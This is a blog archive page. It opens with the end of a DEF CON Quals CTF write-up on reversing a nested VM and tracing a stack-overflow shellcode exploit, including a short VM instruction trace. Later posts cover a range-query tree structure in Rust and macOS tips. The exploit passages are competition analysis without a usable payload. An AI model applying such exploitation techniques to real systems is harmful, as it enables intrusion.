A cool feature that decompilers like Binary Ninja’s have is that you can give them type annotations and names that you figure out and it will use them to improve the decompilation. Whenever we figured something out, possibly annotated by a teammate using our comment syncing system, I’d update my type definitions to get a better decompilation. Here’s an example of some decompilation upon first opening the binary:

And after creating an enum type with all the VM instruction codes we figured out, and annotating the result structure type and parameter names:

Once we figured out the new opcode mappings and features of the VM my teammate Sam made the same changes to the old source code we had and verified that it could run the new Manchester programs we had. This helped check we got it right and also proved really useful for a later tool.

Fooling around with the Binary Ninja Debugger

I spent some time afterwards fooling around with getting the Binary Ninja debugger plugin to connect to the VM binary running in my Docker container and allow me to step through it over the GDB server protocol. This didn’t actually end up being that helpful, but I wanted to learn how to do it anyways because I find the idea of being able to debug a binary in a full reversing suite really cool. It took a lot of code reading since the way to do this using the plugin wasn’t documented.

Memory trace reconstruction tool

Armed with Zack’s Binary Ninja plugin for the inner VM, we were ready to work on exploiting the inner program, but we were having trouble understanding what was going on. It was hard to get information about what happened in the inner VM and running experiments took a long time since the nested weird VMs meant startup took minutes each time.

I set to work on a tool to gain more visibility into the system, and since I think about tracing tools a lot, I made a little tracing system. We had found some memory allocations that we figured stored state of the inner VM, so I modified Sam’s updated source to log every read and write to those memory regions so we could figure out what was going on.

It was surprisingly easy. I stored some info on each event in a uint64_t[4] array with the first field being an event ID and the following fields storing various useful info for each event. Then I cast it to a void* and wrote it to a file with fwrite, which is buffered so I didn’t have to worry about overhead from tons of write syscalls. It turns out there weren’t that many writes though so we later added a flush after each event so we could get streaming updates as the computation progressed.
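As a rough illustration of that record format, here is a Python sketch of the same idea (the original was C code using a uint64_t[4] and fwrite). The event IDs, the meaning of the three payload fields, and the function names are all made up for this example, since the post doesn't list the real ones.

```python
import io
import struct

# Four unsigned 64-bit little-endian fields per event, like a uint64_t[4].
RECORD = struct.Struct("<4Q")

# Hypothetical event IDs, invented for this sketch.
EVENT_READ = 1
EVENT_WRITE = 2

def log_event(out, event_id, region, offset, value, flush=False):
    """Append one fixed-size 32-byte record to a binary stream."""
    out.write(RECORD.pack(event_id, region, offset, value))
    if flush:
        # Flushing after each event trades throughput for streaming updates.
        out.flush()

def demo_log():
    """Log two events into an in-memory buffer and return the raw bytes."""
    out = io.BytesIO()  # stands in for open("trace.bin", "wb")
    log_event(out, EVENT_WRITE, region=0, offset=0x10, value=0xDEADBEEF)
    log_event(out, EVENT_READ, region=0, offset=0x10, value=0xDEADBEEF, flush=True)
    return out.getvalue()
```

Because every record is exactly 32 bytes, a hex editor set to 32 bytes per row shows one event per line.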

Armed with this binary file in a very simple format, I opened it in a hex editor, dragged the window until it was 4*8 bytes wide so it was kind of like an event log, and scrolled through it. I managed to identify which allocated region was the memory of the inner VM and which was the registers, and what offset all the registers were at.

So I wrote a little Python script which could read the trace and print out all the register values each time the program counter register changed, effectively giving us a window into the execution of the machine. Next I reconstructed all the VM memory contents from write events in the trace, which allowed dumping the memory contents at any instruction based on arbitrary conditions, or at the end of the execution.
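A minimal sketch of what such a replay script might look like. The real script isn't shown in the post, so the record fields (event ID, region, offset, value), the region numbering, the byte-sized memory writes and the program counter offset are all assumptions made for illustration.

```python
import struct

RECORD = struct.Struct("<4Q")   # event_id, region, offset, value (assumed layout)
EVENT_WRITE = 2                 # hypothetical event ID
REGION_MEM, REGION_REGS = 0, 1  # hypothetical region numbering
PC_OFFSET = 0                   # hypothetical offset of the program counter

def replay(trace_bytes):
    """Rebuild memory and registers from the write events in a trace.

    Returns (memory, steps): memory maps address -> byte value at the end of
    the trace, and steps holds a register snapshot for every PC change.
    """
    memory, regs, steps = {}, {}, []
    for event_id, region, offset, value in RECORD.iter_unpack(trace_bytes):
        if event_id != EVENT_WRITE:
            continue  # reads don't change state
        if region == REGION_MEM:
            memory[offset] = value & 0xFF
        elif region == REGION_REGS:
            old_pc = regs.get(PC_OFFSET)
            regs[offset] = value
            if offset == PC_OFFSET and value != old_pc:
                steps.append(dict(regs))  # copy so later writes don't alter it
    return memory, steps
```

Stopping the loop early on some condition (a particular PC value, say) would give the memory contents at that instruction rather than at the end of execution.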

This ended up synergizing really well with Zack’s plugin when developing our exploit. We could load the final memory state (which contained the program code as well) in Binary Ninja and it would disassemble everything, and we could even disassemble the shellcode we overflowed onto the stack and see how it had been corrupted by later writes. Then we could go back through the execution trace file and figure out where our exploit had gone wrong.

Zack even loaded the Binary Ninja API in the trace replay tool to add disassembly and symbol names of each executed instruction into the printed trace:

C1_epilogue_and_store+bc       02000200 PUSH    r2
   [pc=0x3c8 sp=0xf30 r1=0xaaa r2=0xef8 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2a9          01021800 MOV    r2, 0x18
   [pc=0xef8 sp=0xf30 r1=0xaaa r2=0xef8 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2ad          04022000 ADD    r2, pc
   [pc=0xefc sp=0xf30 r1=0xaaa r2=0x18 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2b1          01040400 MOV    r4, 0x4
   [pc=0xf00 sp=0xf30 r1=0xaaa r2=0xf18 r4=0x67616c66 r8=0x2088000010101 flags=0x4]
log_name_read_len+2b5          80010100 SVC    0x1, 0x1
   [pc=0xf04 sp=0xf30 r1=0xaaa r2=0xf18 r4=0x4 r8=0x2088000010101 flags=0x4]

Concluding Thoughts

Even though I didn’t work on as many different problems as I usually do for DC Quals (partially due to having my vaccine appointment and getting bowled over by immune reaction half way through), I had fun making a bunch of completely overkill tooling for a really hard problem.

Debugging using the execution trace was a really cool experience that made me yearn for more of that kind of omniscient debugging like Pernosco in my normal programming work. It was great being able to do things like “oh no when did that memory get the bad value” and just using text editor search functionality to find the last MOV to that address “backwards in time”. The “text file of every executed instruction” doesn’t scale to larger programs, but programs like rr and Pernosco do, and I want to use them more.

Implicit In-order Forests: Zooming a billion trace events at 60fps

2021-03-14T00:00:00+00:00

In the course of trying to figure out how to smoothly zoom timelines of a billion trace events, I figured out a cool tree structure that I can’t find elsewhere online, which, it turned out, two of my friends had independently derived after not finding anything in their own searches. It’s a way of implementing an index for doing range aggregations on an array (e.g. “find the sum/max of elements [7,12]”) in O(log N) time, with amortized constant time appends, a simple implementation (around 50 lines of Rust), low constant factors, and low memory overhead.

The structure is a variation on the idea of an implicit binary tree, usually used for heaps, which lets you represent a complete binary tree compactly in an array, with structure determined by layout of the array rather than pointers. Instead of arranging nodes breadth-first like usual, the structure I use has an in-order depth-first arrangement, and it uses a forest of power-of-two sized complete trees instead of one nearly-complete tree. These changes make the implementation of appends much simpler, improve cache efficiency, lower memory overhead, and if combined with a virtual-memory-based growable array provide O(log N) tail latency on appends instead of O(N).

I used my implementation to make a prototype trace timeline that can smoothly zoom 1 billion events, which I don’t think any existing trace viewer can do while preserving similar detail, but the underlying structure can aggregate any associative operation (monoid). While my high-level competitive programmer friends didn’t recognize the layout, my friend Raph Levien remembered figuring out a similar thing for Android’s SpannableStringBuilder, and my colleague Stephen Dolan said he went on a similar journey of discovery while coming up with vectorization-friendly k-d trees.

The `IForestIndex` data structure

The general idea behind data structures to accelerate range queries is that pre-aggregating elements into chunks of varying sizes can save work at query-time. When we get the range we want to query, we pick the set of chunks that together make up the range and aggregate them together, as opposed to aggregating all the individual elements in the range. A binary segment tree structure where the lowest level aggregates two elements, the next aggregates four elements and so on leads to a guarantee that any range can be covered with O(log N) chunks.
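To make the chunk-covering idea concrete, here is a small Python sketch (not from the original post, and independent of any particular array layout) that splits a range into the aligned power-of-two chunks a binary segment tree would have pre-aggregated. The function name is made up for the example.

```python
def cover_with_chunks(start, end):
    """Split the half-open range [start, end) into aligned power-of-two chunks.

    Each chunk is (first_index, size) where size is a power of two and
    first_index is a multiple of size, matching one node of a binary
    segment tree.
    """
    chunks = []
    while start < end:
        size = 1
        # Grow the chunk while it stays aligned and doesn't overshoot the end.
        while start % (size * 2) == 0 and start + size * 2 <= end:
            size *= 2
        chunks.append((start, size))
        start += size
    return chunks
```

For the elements [7,12] (the half-open range 7..13), `cover_with_chunks(7, 13)` gives `[(7, 1), (8, 4), (12, 1)]`, so three pre-aggregated values are combined instead of six individual elements.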

What I’ll describe is a specific way to lay out such an aggregation structure in an array. Take a glance, and I’ll explain the diagram’s details below:

The in-order layout is a way to store an aggregation tree in an array where every even indexed element is a leaf and every odd indexed element aggregates to its left and right using some associative operation (the diagram uses sum). The aggregating nodes form a binary tree structure such that the first level aggregates two leaf nodes, the second level aggregates two level one aggregation nodes, etc…

When our number of items isn’t a power of two, some of the aggregation nodes at higher levels won’t be able to aggregate as far to the right as they’re supposed to, because there isn’t a node there yet, so they’ll be incomplete (shown in grey in the diagram). This means it isn’t technically a tree structure, but a forest of power-of-two sized trees, making up the correct number of total items. When we append a new item, we first append the leaf node, then complete any incomplete trees that should include that node, and then add a new incomplete aggregation node of the right height after it.

How do we decide which level a given node should aggregate and where the incomplete nodes it should complete are? It turns out that with this layout, the level of an aggregation node corresponds exactly to the number of trailing one bits in the binary representation of the index! This is great because modern processors have an efficient single instruction for “count trailing zeros”, and trailing ones just requires a bitwise not before that. It also turns out that the nodes we need to aggregate are powers of two away, and the number of aggregation nodes to complete corresponds to the level of the new aggregation node. This leads to a very simple implementation:

impl<A: Aggregate> IForestIndex<A> {
  // ...
  pub fn push(&mut self, block: &TraceBlock) {
      self.vals.push(A::from_block(block));

      let len = self.vals.len();
      // We want to index the first level every 2 nodes, 2nd level every 4 nodes...
      // This happens to correspond to the number of trailing ones in the index
      let levels_to_index = len.trailing_ones()-1;

      // Complete unfinished aggregation nodes which are now ready
      let mut cur = len-1; // The leaf we just pushed
      for level in 0..levels_to_index {
          let prev_higher_level = cur-(1 << level); // nodes at a level reach 2^level
          let combined = A::combine(&self.vals[prev_higher_level], &self.vals[cur]);
          self.vals[prev_higher_level] = combined;
          cur = prev_higher_level;
      }

      // Push new aggregation node going back one level further than we aggregated
      self.vals.push(self.vals[len-(1 << levels_to_index)].clone());
  }
  // ...
}
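To see the trailing-ones rule concretely, here is a tiny Python sketch (not part of the original implementation; the helper names are made up) that computes the level of every slot in the array.

```python
def trailing_ones(n):
    """Count the trailing one bits of a non-negative integer."""
    count = 0
    while n & 1:
        count += 1
        n >>= 1
    return count

def node_levels(num_nodes):
    """Level of each array slot: 0 for leaves, k for nodes spanning 2**k leaves."""
    return [trailing_ones(i) for i in range(num_nodes)]
```

`node_levels(8)` returns `[0, 1, 0, 2, 0, 1, 0, 3]`: leaves sit at the even indices, and the aggregation node at index 3 (binary 11) is at level 2, so it covers four leaves once complete.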

The range query is more straightforward in that it’s just starting on the left of the range and then skipping forward using the longest-reaching aggregation node it can without overshooting. I’ll let the code (and the example at the top of the diagram) speak for itself:

pub fn range_query(&self, r: Range<usize>) -> A {
    fn left_child_at(node: usize, level: usize) -> bool {
        // every even power of two block at each level is on the left
        (node>>level)&1 == 0
    }
    fn skip(level: usize) -> usize {
        // lvl 0 skips self and agg node next to it, steps up by powers of 2
        2<<level
    }
    fn agg_node(node: usize, level: usize) -> usize {
        node+(1<<level)-1 // lvl 0 is us+0, lvl 1 is us+1, steps by power of 2
    }

    let mut ri = (r.start*2)..(r.end*2); // translate underlying to interior indices
    let len = self.vals.len();
    assert!(ri.start <= len && ri.end <= len,
      "range {:?} not inside 0..{}", r, len/2);

    let mut combined = A::empty();
    while ri.start < ri.end {
        // Skip via the highest level where we're on the left and it isn't too far
        let mut up_level = 1;
        while left_child_at(ri.start, up_level) && ri.start+skip(up_level)<=ri.end {
            up_level += 1;
        }

        let level = up_level - 1;
        combined = A::combine(&combined, &self.vals[agg_node(ri.start, level)]);
        ri.start += skip(level);
    }
    combined
}
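For experimenting without a Rust toolchain, the push and range query above can be transliterated to Python. This sketch is specialised to integer sums rather than a generic aggregate, and the class name is made up; it is meant as a way to poke at the layout, not as a reference implementation.

```python
def trailing_ones(n):
    """Count the trailing one bits of a non-negative integer."""
    count = 0
    while n & 1:
        count += 1
        n >>= 1
    return count

class SumForest:
    """In-order implicit forest over integers, aggregating with +."""

    def __init__(self):
        self.vals = []

    def push(self, item):
        self.vals.append(item)
        n = len(self.vals)
        levels_to_index = trailing_ones(n) - 1
        cur = n - 1  # the leaf we just pushed
        # Complete unfinished aggregation nodes which are now ready.
        for level in range(levels_to_index):
            prev = cur - (1 << level)
            self.vals[prev] += self.vals[cur]
            cur = prev
        # New, still incomplete aggregation node one level higher.
        self.vals.append(self.vals[n - (1 << levels_to_index)])

    def range_query(self, start, end):
        """Sum of the pushed items in the half-open range [start, end)."""
        lo, hi = start * 2, end * 2  # translate to interior indices
        assert lo <= len(self.vals) and hi <= len(self.vals)
        total = 0
        while lo < hi:
            # Highest level where lo is a left child and the skip still fits.
            up_level = 1
            while ((lo >> up_level) & 1) == 0 and lo + (2 << up_level) <= hi:
                up_level += 1
            level = up_level - 1
            total += self.vals[lo + (1 << level) - 1]
            lo += 2 << level
        return total
```

After pushing 1, 2, 3, 4 the backing list is `[1, 3, 2, 10, 3, 7, 4, 10]`: the last slot is the incomplete level-3 node, which a query never reads because its skip would overshoot the array.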

Edit: Michael Rojas wrote a TypeScript implementation that includes more operations (like in-place update), as well as more bit tricks for improved efficiency. I updated the range query in my repo based on his work.

What’s good about this layout

The closest alternative to this layout is the breadth-first layout described everywhere else online, where you put the root node first, then all the nodes of the next level, and so on until at the end you have all the leaf nodes, with some spots at the end unfilled because you need to round the tree size up to the next power of two. Both of these layouts have nice mathematical relations that enable traversing the tree and mapping between leaf node indices and an array storing the data you’re indexing.

Edit: nightcracker on Reddit points out that it’s possible to formulate implicit Fenwick trees for arbitrary range queries with efficient append and a terse implementation. It looks like they have 3N size overhead instead of 2N, and I haven’t investigated enough to speak to other cache or efficiency properties.

Avoiding the memory and tail latency of amortized resizing

The main reason I ended up looking for an alternative to the breadth-first layout is that breadth-first append is annoying to implement. Because it’s a single incomplete tree rather than a forest of complete trees, whenever the size crosses a power of two you need to rearrange everything into a bigger tree structure with one more level. Not only do you need to write code to implement this case but the newly re-allocated tree has a 4x memory overhead over the space required for just the leaf nodes: 2x for being half empty and 2x for the usual cumulative count of all the aggregation nodes. Then if you don’t implement a fancy in-place re-organize, memory peaks at 6x since you need to have both the old and new tree around while you move things. Even if your amortized append cost is still O(1), the tail latency is terrible.

But wait, in my implementation of the in-order layout I use Rust’s growable Vec, and doesn’t that have the same 2x amortized resizing space waste and tail latency issues behind the scenes? Yes, kind of: In the basic case all I’m saving is implementation complexity, but there’s a way to improve the implementation to avoid this. Because 64 bit computers have address spaces way bigger than their physical memories, it’s possible to reserve an enormous address range for an array and then only allocate real pages at the end (which take up physical memory) as the array is filled. This avoids any slow resizing case and makes space waste only a small constant. If you want this to work on Windows, it requires a special implementation, but on Linux and macOS all you need to do is construct your Vec by using Vec::with_capacity with a huge size that’s more than you’ll need and smaller than physical memory, and VM overcommit will promise you the full address range and only use more physical memory as you push to the vector. I was thinking about how this data structure could be used for indexing enormous traces by using most of the memory on a machine, so the fact that this technique allows making the most of memory without much implementation effort was a big win.

You can apply the same technique for some savings on the breadth-first order, but because the aggregation nodes for the unused space are not all at the end of the array you’d need to support missing pages in the middle of your array. You’d also still need to implement an in-place tree reorganize, so it would be much more complicated and you still wouldn’t get the tail latency benefits.
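The reserve-then-fill idea can be sketched outside Rust as well. The Python class below is a hypothetical analogue, not the post's Vec::with_capacity approach: it reserves one large anonymous memory mapping up front and only writes to the front of it, relying on the operating system to typically commit physical pages lazily on first touch. The class name and the fixed u64 element type are assumptions for the example.

```python
import mmap
import struct

class ReservedArray:
    """Append-only array of u64 values backed by one large anonymous mapping."""

    def __init__(self, capacity_items):
        self.capacity = capacity_items
        self.length = 0
        # Anonymous mapping: the address range is reserved now, but on Linux
        # and macOS physical pages are typically only used once written to.
        self.buf = mmap.mmap(-1, capacity_items * 8)

    def push(self, value):
        """Append without ever copying or resizing the existing contents."""
        if self.length == self.capacity:
            raise MemoryError("reserved capacity exhausted")
        struct.pack_into("<Q", self.buf, self.length * 8, value)
        self.length += 1

    def __getitem__(self, index):
        if not 0 <= index < self.length:
            raise IndexError(index)
        return struct.unpack_from("<Q", self.buf, index * 8)[0]

    def __len__(self):
        return self.length
```

Since nothing is ever moved, every append costs the same, which is the tail latency property discussed above; how much address space can be reserved this way depends on the system's overcommit settings.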

Better cache coherency

The depth-first layout has a nice property that near the leaves, entire subtrees are grouped together in memory, meaning subtrees may all be in the same cache line or page. This is especially nice given that range queries can traverse the tree from the bottom up and then down, avoiding touching unnecessary higher levels that are further away. In contrast for a tree in breadth-first order, the next level up will be in a separate range of memory from its leaves. On a huge tree where each parent node may end up on a separate page this may cause lots of TLB misses. This might’ve been bad for a case like my trace visualization, which requires thousands of queries per second on relatively small ranges in a huge structure.

The cache efficiency is likely still not as good as a B-tree or van Emde Boas (vEB) layout, but those are much more complicated to implement. For vEB layouts, I could find research papers and benchmarks that describe the mathematical structure of the layout, but not how to efficiently implement operations like append. The usual breadth-first order is also better at keeping all the higher levels of the tree together, so might perform better for repeated traversals from the root, I’m not sure.

Simpler and more memory-efficient than non-implicit structures

I’ve mainly compared against breadth-first implicit binary trees because they’re the closest competitor, but I started out looking at other structures. I knew about the general idea of segment trees and they’re often implemented as standard non-implicit tree structures. I first embarked on writing a B-tree structure but got frustrated with how much code it was taking and the different cases where non-leaf nodes contained pointers but leaves didn’t. I thought a lot about other data structures like skip lists and various optimizations of them but they were still too complex. The non-implicit data structures also tended to introduce a lot of memory overhead via their node pointers.

Other nice properties

In addition to appending, it’s possible to do some other operations like updating the values of nodes in place (Raph’s SpannableStringBuilder does this). If you’re building an entire tree at once instead of incrementally appending it’s possible to parallelize the construction of the index by divvying up subtrees among threads. I figured out but never used the fact that if you want to search a forest from the top down then checking the largest/first tree and working down has binary-search-like efficiency properties since the power-of-two structure means all the further trees together can be at most half the remaining items. Within each tree, my colleague Stephen pointed out that if you want to traverse the tree down to an index, then iterating the bits of the index in reverse tells you the direction to recurse at each level.
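The bit-iteration trick for walking down a tree can be sketched as follows. This is an illustration under simplifying assumptions, not code from the post: it handles a single complete tree that starts at array index 0 (a later tree in the forest would need its base offset added), and the function name is made up.

```python
def path_to_leaf(leaf, height):
    """Array indices visited walking from the root of one tree down to a leaf.

    The tree has 2**height leaves stored in-order starting at array index 0,
    so leaf number k lives at index 2*k and the root at index 2**height - 1.
    """
    target = 2 * leaf
    node = (1 << height) - 1
    path = [node]
    # Walk the bits of the target index from high to low.
    for level in range(height, 0, -1):
        step = 1 << (level - 1)           # distance to either child
        go_right = (target >> level) & 1  # bit `level` picks the direction
        node = node + step if go_right else node - step
        path.append(node)
    return path
```

For a tree of 8 leaves, `path_to_leaf(5, 3)` returns `[7, 11, 9, 10]`: right from the root at 7, left from 11, then right from 9 to the leaf at index 10.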

Backstory: Rendering huge traces

So how did I end up investigating this and what’s the connection to trace viewers? I was trying out Tracy, a system for doing performance optimization by capturing tracing events from instrumentation in your code and displaying it on a slick timeline UI, and I noticed that when I zoomed out enough all the detail was replaced with a squiggle that signified “some events here”. I’d used Perfetto and Catapult (other trace viewers, both by Google) before and they continued to show the texture of my trace events when zoomed out, but became very slow on large traces. I’ve never used RAD Telemetry but it looks like it’s somewhere in between, where unlike Tracy it still shows the number of levels but loses all other information when zoomed out.

Edit: Per Vognesen on Twitter says Telemetry does have a range aggregation data structure, which I’m guessing they use for aggregating time summary information panels (since their zoomed out rendering looks different than Perfetto). He links an interesting HN comment of his discussing a design using a hierarchy of B+ trees.

I checked Perfetto’s source code and found that it was quantizing the trace into small time slices and displaying the color of the longest trace span under each time slice at each level. Combined with Perfetto’s approach of coloring trace spans based on a hash of the label, I thought this was a good way to give an overview of a zoomed out trace. It tended to show what the dominant event was at each level, how deep the nesting was at different points, and clicking showed what that specific event color was.

The problem is that Perfetto’s implementation used a slow linear scan and so when zoomed out on a large trace was very slow, and they relied on asynchrony to keep the UI responsive while the next zoom level was being computed. Since the “longest span in a time slice” corresponded to a range aggregation of “maximum duration” I thought it should be possible to use a tree structure to accelerate this and find the longest span under every pixel for every track of a large trace at 60fps, since that would only be on the order of 10k O(log N) queries per frame, and it could be parallelized across tracks.
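Here is a rough Python sketch of the "longest span under every pixel" query for a single track. It is not the prototype's code: a plain breadth-first implicit segment tree stands in for the range-max index, the function and class names are made up, and for simplicity each span is attributed only to the pixel where it starts.

```python
from bisect import bisect_left

class MaxTree:
    """Plain breadth-first implicit segment tree for range max (a stand-in index)."""

    def __init__(self, values):
        self.n = len(values)
        self.tree = [0] * self.n + list(values)
        for i in range(self.n - 1, 0, -1):
            self.tree[i] = max(self.tree[2 * i], self.tree[2 * i + 1])

    def query(self, lo, hi):
        """Max of values[lo:hi], or 0 for an empty range."""
        best = 0
        lo += self.n
        hi += self.n
        while lo < hi:
            if lo & 1:
                best = max(best, self.tree[lo])
                lo += 1
            if hi & 1:
                hi -= 1
                best = max(best, self.tree[hi])
            lo >>= 1
            hi >>= 1
        return best

def longest_per_pixel(starts, durations, view_start, view_end, width):
    """For each pixel column, the longest duration among spans starting in it.

    `starts` must be sorted ascending and durations must be non-negative.
    """
    index = MaxTree(durations)  # a real viewer would build this once, not per frame
    # Timestamps of the pixel column boundaries across the viewport.
    bounds = [view_start + (view_end - view_start) * px // width
              for px in range(width + 1)]
    # Binary search turns each time boundary into an index into the span array.
    cuts = [bisect_left(starts, t) for t in bounds]
    return [index.query(cuts[px], cuts[px + 1]) for px in range(width)]
```

Each frame then costs one binary search per pixel boundary plus one O(log N) range query per pixel, regardless of how many spans fall under each pixel.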

I then embarked on my journey figuring out the IForestIndex data structure, and afterwards I used it to put together a simple proof-of-concept skeleton of a trace viewer that can smoothly zoom a trace of 1 billion randomly generated events. It’s not pretty since the randomly generated data has no structure, the colors are bad, it doesn’t render any span labels, and I don’t step backwards to render spans that start before the viewport starts, but it works:

[Video: the proof-of-concept trace viewer zooming a trace of 1 billion randomly generated events]

I don’t actually plan on implementing my own full trace viewer, it’s a big task. I just wanted to have fun figuring out how to achieve the kind of trace zooming I wanted, and figure out a cool data structure in the process, since I suspected it was possible but didn’t know of anyone who’d done it. Given that I’m one of three people I know who’ve had to figure out this data structure themselves, hopefully this post will help any future people who want a data structure for this kind of problem.

Hard to discover tips and apps for making macOS pleasant

2020-09-04T00:00:00+00:00

Inspired by a few different conversations with friends who’ve switched to macOS where I give them a whole bunch of tips and recommendations I’ve learned about over many years which are super important to how I use my computer, but often quite hard to find out about, I decided to write them all down:

Hidden macOS tips

Dragging a file or folder onto a file open dialog selects it in the dialog. Similarly dragging onto a “Choose file” button.
Dragging onto a terminal window pastes the full path of that file/folder
You can drag the little file/folder icons at the top of many windows, useful in combo with previous tips.
If you hold down option while clicking the “Scaled” radio button in the Display preferences it’ll give you many more resolution options on external displays. If you want native resolution with no scaling on the built in display you’ll still need an external tool like SwitchResX, retina or QuickRes.
In Finder, return is the shortcut for rename, option+drag copies, and space is quicklook preview
In Preview if you open the Sidebar in a PDF you can drag pages around including between documents, hold option to copy, delete pages with backspace. This plus the edit toolbar solves 90% of my PDF munging needs.
You can select multiple images in Finder and drag them onto the Preview dock icon to open them in one window with a Sidebar where you can quickly flip between them with arrow keys.
In the Dock preferences there’s a “Prefer tabs when opening documents” setting which automatically groups your windows with window tabs. I find this especially useful for Sublime Text.
cmd+backtick is like cmd+tab but between windows of the same app. Adding shift (i.e., cmd+shift+backtick) reverses the order. You can add shift to cmd+tab to go backwards too.
Drag your most frequently used folders into the Finder sidebar for easy access including in file select dialogs.
Select multiple similarly named files in Finder, right-click, and choose “Rename Items...” for a reasonably powerful batch file renamer.
In the Finder preferences you can add your computer and drives to the sidebar.
cmd+shift+4 pops up a crosshair to take a screenshot of a region. Hit spacebar to switch to a mode that takes a screenshot of an entire window.
You can disable the popup for accented characters when you hold a key and increase key repeat rate beyond the normal maximum.
The open command lets you use the normal macOS file opening mechanism from the command line, I most frequently use open . to navigate to my current directory in my file browser.
Display “scales” other than 1x or 2x the physical resolution work by rendering at 2x the resolution then down-scaling. This causes apps to need to render a bunch of pixels that are mostly scaled away, consuming power and sometimes causing lag. It can also lead to weird aliasing issues in some contexts like shimmering of thin fonts when scrolling, as well as rendering in general not being pixel-perfect. I recommend trying to stick to either 1x or 2x scaling if you don’t lose much from it, then just adjusting your default web page scale and font sizes.
Text fields support a bunch of powerful movement and editing shortcuts based on Emacs.
option+2 types the ™ symbol, for use with sarcasm™. I probably use this more than the ^ symbol. You can open the keyboard viewer (you may have to enable “Show keyboard and emoji viewers in menu bar” in Keyboard Preferences) and hold down option to see all the other symbols you can type like this. The “Emoji & Symbols” palette is also a great UI for finding handy Unicode characters, especially if you use the gear menu to add more symbol category pages.

Apps

A big part of why I prefer macOS is this list of macOS-only native apps which often don’t have adequate substitutes on Linux:

Dash: An amazing fast offline documentation search app. Cuts down a ton on the amount I Google for docs. It’s very quick to use especially when summoned with a keyboard shortcut and has tons of documentation sets.
Hammerspoon: My favorite app for getting the benefits of a Linux tiling window manager. I have home row shortcuts on my left hand bound to switch directly to my most frequently used apps, and my right hand to maximize windows, move them between screens and tile them to the left and right halves of the screen. Here’s my config.
Screenie: I only use this for the feature where dragging from the menu bar icon lets you put your most recent screenshot in say messaging apps. It also offers search and things. CleanShot X and Zappy also look like good screenshot apps but I haven’t tried them yet.
Karabiner Elements: A powerful keyboard remapping tool. I use it to bind right command to control and caps lock to ctrl+cmd+option+shift for use with Hammerspoon.
Alfred: A mildly better Spotlight alternative, but for me the main benefit over Spotlight is this workflow for indexing git repos.
Path Finder: A fancier version of Finder with multiple panes and various other advanced features. Other third party file managers you may want to try include Forklift, Commander One, Nimble Commander, Marta and fman. I use Path Finder because it’s the only one with a good columns view and that’s my favorite view for browsing.
Spark: A nice email app with categorized inbox functionality.
iStat Menus: All sorts of system monitoring in a menu bar. I really like the weather, and I also have a combined menu which shows my current power draw in watts and GPU selection in the icon.
Tweetbot: A native Twitter client that syncs with a similar iOS client. I really like how it just keeps your position in an infinite scroll where new tweets get added to the top, so I can easily read every new tweet from people I follow without seeing any likes, algorithmic suggestions or ads.
Hex Fiend: A really good hex editor/viewer. I like their “Templates” feature where you can describe a binary format with a script and it will overlay the parse tree on the hex view.
iTerm2: An alternative Terminal with just so many features. I particularly like the ability to split windows into panes, which Apple’s Terminal does not have.
nvAlt: A note taking app that I like, although it’s kinda bare-bones and has some bugs. It’s currently unmaintained because the author is working on nvUltra which isn’t released yet.
ImageOptim: Easy app where you drag image files onto it and it reduces their size.
VMware Fusion: Great for running Linux and Windows VMs. The reason I chose it over Parallels is that I knew it had virtualized PMC support, which enables using rr in VMs. But apparently Parallels also has this in the Pro version, and it might be nicer in other ways, not sure which is better.
Calca: A weird live math calculator notebook thing with units. The editing can be kind of glitchy but the basic functionality is really cool. Soulver is a similar but more expensive app with a nicer UI but less powerful underlying calculator language.
Quartz Debug: There are some apps that reduce your battery life in an insidious way where it doesn’t show as CPU usage for their process but as increased WindowServer CPU usage. If your WindowServer process CPU usage is above maybe 6-10% when you’re not doing anything, some app in the background is probably spamming 60fps animation updates. As far as I know you can only figure out which app is at fault by getting the Quartz Debug app from Apple’s additional developer tools, enabling flash screen updates (and no delay after flash), then going to the overview mode (four finger swipe up) and looking for flashing. This same problem can also occur on Linux and Windows but I don’t know how much power it saps there.
Sublime Text and Merge: These aren’t exactly macOS-only apps but they’re some of my favorite apps and they integrate excellently with macOS so I’m putting them here anyways.

Bonus: Browsers

Middle click opens links in a new tab and middle clicking on a tab closes it
There are lots of lesser-known handy shortcuts: cmd/ctrl+l focuses the search field, cmd/ctrl+w closes a tab
Vimium and OctoTree are my favorite browser extensions.
I believe YouTube in Chrome and Firefox default to VP8/9 video codecs which can’t be hardware-decoded so use lots of CPU and thus battery power especially at 2x speed or high resolutions. The h264ify family of extensions can force usage of GPU-supported h264 codecs. This can close some of the battery life gap with Safari.
If you use Safari, Chrome and Firefox have much better sounding audio resampling for watching videos on 1.5x or 2x speed. This is the only reason I don’t use Safari.

Bonus: iOS

iOS also has a bunch of hidden UI features, especially if you have a medium-old model of iPhone that still has force touch sensors.

Swiping left and right on the home bar at the bottom of the screen on phones since the iPhone X quickly switches between recent apps. This is absolutely essential to how I use my phone and such a huge boost to multitasking fluidity I feel bad for all the people who don’t know about it.
Force or long pressing on the keyboard (maybe just the spacebar on some phones), brings up a moveable cursor in text fields.
If you have force touch try it on everything, tons of widgets in the pull down settings have force touch features, notifications do, links do.
I’ve tried a lot of calculator apps and Kalkyl is my favorite for launch time and UI design for quick simple calculations. I also recommend Unread for RSS, and Apollo as possibly the best Reddit experience on any platform.
Is It Snappy lets you use an iOS device’s high speed camera to measure full-system interaction latency and find out that you have a slow keyboard, mouse or monitor. I have not found a similar app for Android.
Not exactly a software tip, but a non-obvious purchasing option: I contend buying an iPhone X on eBay offers outstanding price/quality ratio even in 2020. It has basically the same screen/form factor/build quality as an iPhone 11 Pro, and I find it plenty fast and the camera sufficiently good, and those are basically the only things that improved. You even get force touch (“3D Touch”), which I really like as having lower latency than the more press-and-hold “Haptic Touch”. Meanwhile it’s less than half the price. I got mine discounted after the iPhone XS replaced it, and if mine broke I’d probably just buy another one now.

Bonus: The Chromium Catapult Trace Viewer

I was motivated to write this post by a conversation with a friend about macOS, which was in turn kicked off by a tweet about the Chromium Trace Viewer (AKA Catapult). Catapult is super easy to get started with for visualizing trace data and I know lots of different people and projects who use it. Almost none of them know about this incredibly helpful first tip until I tell it to them, so they’re stuck with having to switch to the zoom tool in the toolbar:

Use alt+scroll to zoom. This really ought to be in noticeable text on their UI not buried in a shortcuts pane you have to press ? to see.
The search bar in the top left searches not only names but also argument values, which you can use to search for IDs or add special tags like top100 for the 100 slowest events. Press f to zoom to a span once you’ve selected it with the search arrow buttons.
The JSON event format also supports “flow” arrows, which let you draw arrows between your boxes to visualize dependencies.
